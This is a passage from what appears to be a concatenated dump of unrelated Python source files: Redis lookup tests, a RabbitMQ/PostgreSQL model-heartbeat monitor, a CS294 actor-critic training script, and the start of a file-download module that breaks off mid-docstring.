ranges = conn.zcard('ip2cityid:')
print("Loaded ranges into Redis:", ranges)
self.assertTrue(ranges > 1000)
print()
print("Importing Location lookups to Redis... (this may take a while)")
import_cities_to_redis(conn, 'GeoLiteCity-Location.csv')
cities = conn.hlen('cityid2city:')
print("Loaded city lookups into Redis:", cities)
self.assertTrue(cities > 1000)
print()
print("Let's lookup some locations!")
rr = random.randrange
for i in range(5):
print(find_city_by_ip(conn, '%s.%s.%s.%s' % (rr(1, 255), rr(256), rr(256), rr(256))))
def test_is_under_maintenance(self):
print("Are we under maintenance (we shouldn't be)?", is_under_maintenance(self.conn))
self.conn.set('is-under-maintenance', 'yes')
print("We cached this, so it should be the same:", is_under_maintenance(self.conn))
time.sleep(1)
print("But after a sleep, it should change:", is_under_maintenance(self.conn))
print("Cleaning up...")
self.conn.delete('is-under-maintenance')
time.sleep(1)
print("Should be False again:", is_under_maintenance(self.conn))
def test_config(self):
print("Let's set a config and then get a connection from that config...")
set_config(self.conn, 'redis', 'test', {'db': 15})
@redis_connection('test')
def test(conn2):
return bool(conn2.info())
print("We can run commands from the configured connection:", test())
if __name__ == '__main__':
unittest.main()
|
monitor.py
|
#!/usr/bin/env python
import datetime
import dateutil.parser
import http.server
import json
import logging
import os
import threading
import time
import urllib.parse
import pika
import psycopg2
import requests
# parameters to connect to RabbitMQ
rabbitmq_uri = os.getenv('RABBITMQ_URI', 'amqp://guest:guest@localhost/%2F')
rabbitmq_mgmt_port = os.getenv('RABBITMQ_MGMT_PORT', '15672')
rabbitmq_mgmt_path = os.getenv('RABBITMQ_MGMT_PATH', '/')
rabbitmq_mgmt_url = os.getenv('RABBITMQ_MGMT_URL', '')
rabbitmq_username = None
rabbitmq_password = None
# parameters to connect to BETY database
postgres_host = os.getenv('PGHOST', 'postgres')
postgres_port = os.getenv('PGPORT', '5432')
postgres_user = os.getenv('BETYUSER', 'bety')
postgres_password = os.getenv('BETYPASSWORD', 'bety')
postgres_database = os.getenv('BETYDATABASE', 'bety')
postgres_uri = None
# name of host when registering the model
pecan_fqdn = os.getenv('FQDN', 'docker')
# list of all models.
models = {}
# frequency, in seconds, with which the queue message counts are updated
update_frequency = 60
# number of seconds before a consumer is removed
remove_model_timeout = 15 * 60
# ----------------------------------------------------------------------
# WEB SERVER
# ----------------------------------------------------------------------
class MyServer(http.server.SimpleHTTPRequestHandler):
"""
    Handles the responses from the web server. The only request handled
    specially is a GET for models.json, which returns all known models.
"""
def do_GET(self):
self.path = os.path.basename(self.path)
if self.path == '':
self.path = '/'
if self.path.startswith('models.json'):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(bytes(json.dumps(models), 'utf-8'))
else:
super().do_GET()
def http_server(host_port=9999):
"""
Start a webserver to return all models that registered since this
application started.
"""
server = http.server.HTTPServer(("", host_port), MyServer)
try:
server.serve_forever()
finally:
server.server_close()
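# Hedged usage sketch (not part of the original module): how a client might query
# the web server started by http_server() above. The base URL is an assumption
# (http_server defaults to port 9999); the response shape mirrors the `models`
# dict that MyServer serializes to models.json.
def _example_fetch_models(base_url="http://localhost:9999"):
    """Fetch models.json and summarize queue depth and consumer count per model."""
    data = requests.get("%s/models.json" % base_url, timeout=5).json()
    summary = {}
    for model_type, versions in data.items():
        for version, info in versions.items():
            summary[(model_type, version)] = (info['messages'], len(info['consumers']))
    return summary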
# ----------------------------------------------------------------------
# MESSAGES IN QUEUES
# ----------------------------------------------------------------------
def get_mgmt_queue_messages(queue):
"""
Get the number of messages waiting in the queue.
"""
global rabbitmq_username, rabbitmq_password, rabbitmq_mgmt_url
try:
response = requests.get(rabbitmq_mgmt_url + queue, auth=(rabbitmq_username, rabbitmq_password), timeout=5)
if response.status_code == 404:
# queue does not exist, so we assume 0 messages
return 0
response.raise_for_status()
return response.json()['messages']
except Exception:
logging.exception("Error getting list of messages in %s" % queue)
return 0
def keep_entry(consumer):
"""
    Return True if the consumer has been seen within the last remove_model_timeout seconds.
"""
    global remove_model_timeout
now = datetime.datetime.now()
delta = now - dateutil.parser.parse(consumer['last_seen'])
    return delta.total_seconds() < remove_model_timeout
def update_counts():
"""
Contacts the RabbitMQ server and checks the number of jobs in the queue. It will
also clean up the list of consumers based on the last time a heartbeat was seen
from the consumer.
This will run continuously and should be run as a daemon thread.
"""
global models, update_frequency
while True:
try:
for versions in models.values():
for model in versions.values():
# use management api to get counts
waiting = get_mgmt_queue_messages(model['queue'])
model['messages'] = waiting
model['consumers'] = {k: v for k, v in model['consumers'].items() if keep_entry(v)}
except Exception:
logging.exception("ERROR")
time.sleep(update_frequency)
# ----------------------------------------------------------------------
# EXTRACTOR HEARTBEATS
# ----------------------------------------------------------------------
def insert_model(model_info):
"""
Insert the model info into the database. If the host, modeltype or
    model does not exist, it will be inserted into the database as well.
"""
global postgres_uri, postgres_host, postgres_port, postgres_database
global postgres_user, postgres_password
if not postgres_uri:
postgres_uri = "host=%s port=%s dbname=%s user=%s password=%s connect_timeout=10" % (
postgres_host, postgres_port, postgres_database, postgres_user, postgres_password
)
conn = None
try:
# connect to the PostgreSQL database
conn = psycopg2.connect(postgres_uri)
# make sure host exists
cur = conn.cursor()
cur.execute("SELECT id FROM machines WHERE hostname=%s", (pecan_fqdn,))
result = cur.fetchone()
cur.close()
if result:
host_id = result[0]
else:
logging.debug("Adding host")
cur = conn.cursor()
cur.execute('INSERT INTO machines (hostname) '
'VALUES (%s) RETURNING id', (pecan_fqdn, ))
result = cur.fetchone()
cur.close()
if not result:
logging.error("Could not insert host.")
return
host_id = result[0]
logging.debug("Found hostname for %s == %d" % (pecan_fqdn, host_id))
# Make sure modeltype exists
cur = conn.cursor()
cur.execute("SELECT id FROM modeltypes WHERE name=%s", (model_info['type'],))
result = cur.fetchone()
cur.close()
if result:
model_type_id = result[0]
else:
logging.debug("Adding modeltype")
cur = conn.cursor()
cur.execute('INSERT INTO modeltypes (name) '
                        'VALUES (%s) RETURNING id', (model_info['type'],))
result = cur.fetchone()
cur.close()
if not result:
logging.error("Could not insert modeltypes.")
return
model_type_id = result[0]
logging.debug("Found modeltype for %s == %d" % (model_info['type'], model_type_id))
# Make sure model exists
cur = conn.cursor()
cur.execute("SELECT id FROM models WHERE model_name=%s AND modeltype_id=%s AND revision=%s",
(model_info['name'], model_type_id, model_info['version']))
result = cur.fetchone()
cur.close()
if result:
model_id = result[0]
else:
logging.debug("Adding model")
cur = conn.cursor()
cur.execute('INSERT INTO models (model_name, modeltype_id, revision) '
'VALUES (%s, %s, %s) RETURNING id',
(model_info['name'], model_type_id, model_info['version']))
result = cur.fetchone()
cur.close()
if not result:
logging.error("Could not insert model.")
return
model_id = result[0]
logging.debug("Found model for %s %s (%s) == %d" %
(model_info['name'], model_info['type'], model_info['version'], model_id))
# check if binary already added
cur = conn.cursor()
cur.execute("SELECT id FROM dbfiles "
"WHERE container_type='Model' AND container_id=%s "
"AND file_name=%s AND file_path=%s and machine_id=%s",
(model_id, os.path.basename(model_info['binary']), os.path.dirname(model_info['binary']), host_id))
result = cur.fetchone()
cur.close()
if result:
dbfile_id = result[0]
else:
logging.debug("Adding model binary")
cur = conn.cursor()
cur.execute("INSERT INTO dbfiles (container_type, container_id, file_name, file_path,"
" machine_id)"
" VALUES ('Model', %s, %s, %s, %s) RETURNING id",
(model_id, os.path.basename(model_info['binary']),
os.path.dirname(model_info['binary']), host_id))
result = cur.fetchone()
cur.close()
if not result:
logging.error("Could not insert model binary.")
return
dbfile_id = result[0]
logging.debug("Found model binary for %s %s (%s) on %s == %d" %
(model_info['name'], model_info['type'], model_info['version'], pecan_fqdn, dbfile_id))
# commit all changes to the database
conn.commit()
except (Exception, psycopg2.DatabaseError):
logging.exception("Error adding model to database")
finally:
if conn is not None:
conn.close()
def callback(ch, method, properties, body):
"""
A heartbeat of a model is received. Register the model with the database.
"""
global models
data = json.loads(body.decode('utf-8'))
data['updated'] = datetime.datetime.now().isoformat()
    if 'id' not in data or 'model_info' not in data or 'queue' not in data:
logging.error("missing fields in json : %r " % body)
return
model_info = data['model_info']
if model_info['type'] not in models:
models[model_info['type']] = {}
if model_info['version'] not in models[model_info['type']]:
insert_model(model_info)
waiting = get_mgmt_queue_messages(data['queue'])
models[model_info['type']][model_info['version']] = {
'model_info': model_info,
'queue': data['queue'],
'messages': waiting,
'consumers': {}
}
model = models[model_info['type']][model_info['version']]
model['consumers'][data['id']] = {
'hostname': data['hostname'],
'last_seen': datetime.datetime.now().isoformat(),
}
if model['queue'] != data['queue']:
logging.error("mismatched queue names %s != %s." % (data['queue'], model['queue']))
model['queue'] = data['queue']
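# Illustrative only (not taken from the original code): the shape of a heartbeat
# message that callback() expects, inferred from the fields read above and in
# insert_model(). All values below are hypothetical.
_EXAMPLE_HEARTBEAT = {
    "id": "consumer-1",                     # unique id of the consumer process
    "hostname": "worker-0",                 # host the consumer runs on
    "queue": "SIPNET_r136",                 # RabbitMQ queue the model listens on
    "model_info": {
        "type": "SIPNET",                   # maps to modeltypes.name
        "version": "r136",                  # maps to models.revision
        "name": "SIPNET",                   # maps to models.model_name
        "binary": "/usr/local/bin/sipnet",  # split into dbfiles file_path / file_name
    },
}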
def rabbitmq_monitor():
"""
    Create a connection with RabbitMQ and wait for heartbeats. This
    runs continuously as the main thread; if it stops, the application
    stops.
"""
global rabbitmq_mgmt_url, rabbitmq_mgmt_port, rabbitmq_mgmt_path, rabbitmq_username, rabbitmq_password
params = pika.URLParameters(rabbitmq_uri)
connection = pika.BlockingConnection(params)
# create management url
if not rabbitmq_mgmt_url:
if params.ssl_options:
rabbitmq_mgmt_protocol = 'https://'
else:
rabbitmq_mgmt_protocol = 'http://'
rabbitmq_mgmt_url = "%s%s:%s%sapi/queues/%s/" % (rabbitmq_mgmt_protocol, params.host, rabbitmq_mgmt_port,
rabbitmq_mgmt_path,
urllib.parse.quote_plus(params.virtual_host))
rabbitmq_username = params.credentials.username
rabbitmq_password = params.credentials.password
# connect to channel
channel = connection.channel()
# create models exchange for fanout
channel.exchange_declare(exchange='models', exchange_type='fanout', durable=True)
# create anonymous queue
result = channel.queue_declare('', exclusive=True)
channel.queue_bind(exchange='models', queue=result.method.queue)
# listen for messages
channel.basic_consume(on_message_callback=callback, queue=result.method.queue, auto_ack=True)
channel.start_consuming()
# ----------------------------------------------------------------------
# MAIN
# ----------------------------------------------------------------------
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)-15s [%(threadName)-15s] %(levelname)-7s :'
' %(name)s - %(message)s',
level=logging.INFO)
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARN)
thread = threading.Thread(target=http_server)
thread.setDaemon(True)
thread.start()
thread = threading.Thread(target=update_counts)
thread.setDaemon(True)
thread.start()
rabbitmq_monitor()
|
train_ac_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
"""
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
            output_activation: activation of the output layer
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
with tf.variable_scope(scope):
output_placeholder = input_placeholder
for l_num in range(n_layers):
layer = tf.layers.Dense(units = size, activation = activation)
output_placeholder = layer(output_placeholder)
layer = tf.layers.Dense(units = output_size, activation = output_activation)
output_placeholder = layer(output_placeholder)
return output_placeholder
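# Hedged example (not part of the original assignment code): how build_mlp above
# might be called to map a 4-dimensional observation to 2 logits with two hidden
# layers of 64 units. The placeholder and scope names are illustrative only.
def _example_build_mlp():
    example_ob = tf.placeholder(shape=[None, 4], dtype=tf.float32, name="example_ob")
    return build_mlp(example_ob, 2, "example_scope", n_layers=2, size=64)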
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
            Placeholders for batch observations / actions / advantages in actor critic
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'Theta-discrete', self.n_layers, self.size)
return sy_logits_na
else:
with tf.variable_scope('Theta-contin') as scope:
sy_mean = build_mlp(sy_ob_no, self.ac_dim, scope, self.n_layers, self.size)
sy_logstd = tf.get_variable("log_std", shape=(self.ac_dim,))
return (sy_mean, sy_logstd)
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_sampled_ac = tf.random.categorical(logits = sy_logits_na, num_samples =1)
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.math.exp(sy_logstd) * tf.random.normal(shape = tf.shape(sy_mean))
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_logprob_n = tf.math.log(1e-8 + tf.gather_nd(tf.nn.softmax(logits=sy_logits_na),
tf.stack([tf.range(tf.shape(sy_logits_na)[0]), sy_ac_na], axis=1)))
else:
sy_mean, sy_logstd = policy_parameters
mvn = tfp.distributions.MultivariateNormalDiag(loc = sy_mean, scale_diag= tf.math.exp(sy_logstd))
sy_logprob_n =mvn.log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
            _no - this tensor should have shape (batch size /n/, observation dim)
            _na - this tensor should have shape (batch size /n/, action dim)
            _n - this tensor should have shape (batch size /n/)
            Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
actor_loss = tf.reduce_sum(-self.sy_logprob_n * self.sy_adv_n)
self.actor_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(actor_loss)
# define the critic
self.critic_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_critic",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
ac = self.sess.run(self.sy_sampled_ac, {self.sy_ob_no : ob[None,:]})
if self.discrete:
ac = ac[0].item()
else:
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
# add the observation after taking a step to next_obs
next_obs.append(ob)
rewards.append(rew)
steps += 1
# If the episode ended, the corresponding terminal value is 1
# otherwise, it is 0
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
                    at that timestep or 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
# First, estimate the Q value as Q(s, a) = r(s, a) + gamma*V(s')
# To get the advantage, subtract the V(s) to get A(s, a) = Q(s, a) - V(s)
# This requires calling the critic twice --- to obtain V(s') when calculating Q(s, a),
# and V(s) when subtracting the baseline
# Note: don't forget to use terminal_n to cut off the V(s') term when computing Q(s, a)
# otherwise the values will grow without bound.
# YOUR CODE HERE
v_n = self.sess.run(self.critic_prediction, {self.sy_ob_no : ob_no})
vtp1_n = self.sess.run(self.critic_prediction, {self.sy_ob_no : next_ob_no})
q_n = re_n + self.gamma * vtp1_n * (1 - terminal_n)
adv_n = q_n - v_n
if self.normalize_advantages:
adv_n = (adv_n - np.mean(adv_n))/(np.std(adv_n) + 1e-8)
return adv_n
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
                    at that timestep or 0 if the episode did not end
returns:
nothing
"""
        # Use bootstrapped target values to update the critic
# Compute the target values r(s, a) + gamma*V(s') by calling the critic to compute V(s')
# In total, take n=self.num_grad_steps_per_target_update*self.num_target_updates gradient update steps
# Every self.num_grad_steps_per_target_update steps, recompute the target values
# by evaluating V(s') on the updated critic
# Note: don't forget to use terminal_n to cut off the V(s') term when computing the target
# otherwise the values will grow without bound.
for _ in range(self.num_target_updates):
vtp1_n = self.sess.run(self.critic_prediction, {self.sy_ob_no : next_ob_no})
target_n = re_n + self.gamma * vtp1_n * (1 - terminal_n)
for i in range(self.num_grad_steps_per_target_update):
self.sess.run(self.critic_update_op, {self.sy_target_n : target_n, self.sy_ob_no : ob_no})
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
self.sess.run(self.actor_update_op,
feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
    # Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
# Call tensorflow operations to:
# (1) update the critic, by calling agent.update_critic
        # (2) use the updated critic to compute the advantage, by calling agent.estimate_advantage
# (3) use the estimated advantage values to update the actor, by calling agent.update_actor
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
    parser.add_argument('--subdir', type=str, default='data',
                        help='Name of the subdirectory in which to store the results. '
                             'Useful for building plots from this directory later.')
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), args.subdir)
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
download.py
|
"""
TODO: handle parallel downloads
"""
import os
import urlparse
import threading
from Queue import Queue, Empty
import subprocess
from malleefowl import config
from malleefowl.utils import esgf_archive_path
from malleefowl.exceptions import ProcessFailed
import logging
LOGGER = logging.getLogger("PYWPS")
def download_with_archive(url, credentials=None):
"""
Downloads file. Checks before downloading if file is already in
local esgf archive.
"""
file_url = esgf_archive_path(url)
if file_url is None:
file_url = download(url, use_file_url=True, credentials=credentials)
return file_url
def download(url, use_file_url=False, credentials=None):
"""
Downloads url and returns local filename.
:param url: url of file
:param use_file_url: True if result should be a file url "file://", otherwise use system path.
:param credentials: path to credentials if security is needed to download file
:returns: downloaded file with either file:// or system path
"""
parsed_url = urlparse.urlparse(url)
if parsed_url.scheme == 'file':
result = url
else:
result = wget(url=url, use_file_url=use_file_url, credentials=credentials)
return result
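# Hedged usage sketch (not part of the original module): how download() might be
# called. The URL and local path below are hypothetical placeholders.
def _example_download():
    # a plain http url is fetched with wget() and returned as a file:// url
    nc_file = download('http://example.org/data/tas.nc', use_file_url=True)
    # a file:// url is returned unchanged
    local = download('file:///tmp/tas.nc')
    return nc_file, local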
def wget(url, use_file_url=False, credentials=None):
"""
Downloads url and returns local filename.
TODO: refactor cache handling.
:param url: url of file
:param use_file_url: True if result should be a file url "file://", otherwise use system path.
:param credentials: path to credentials if security is needed to download file
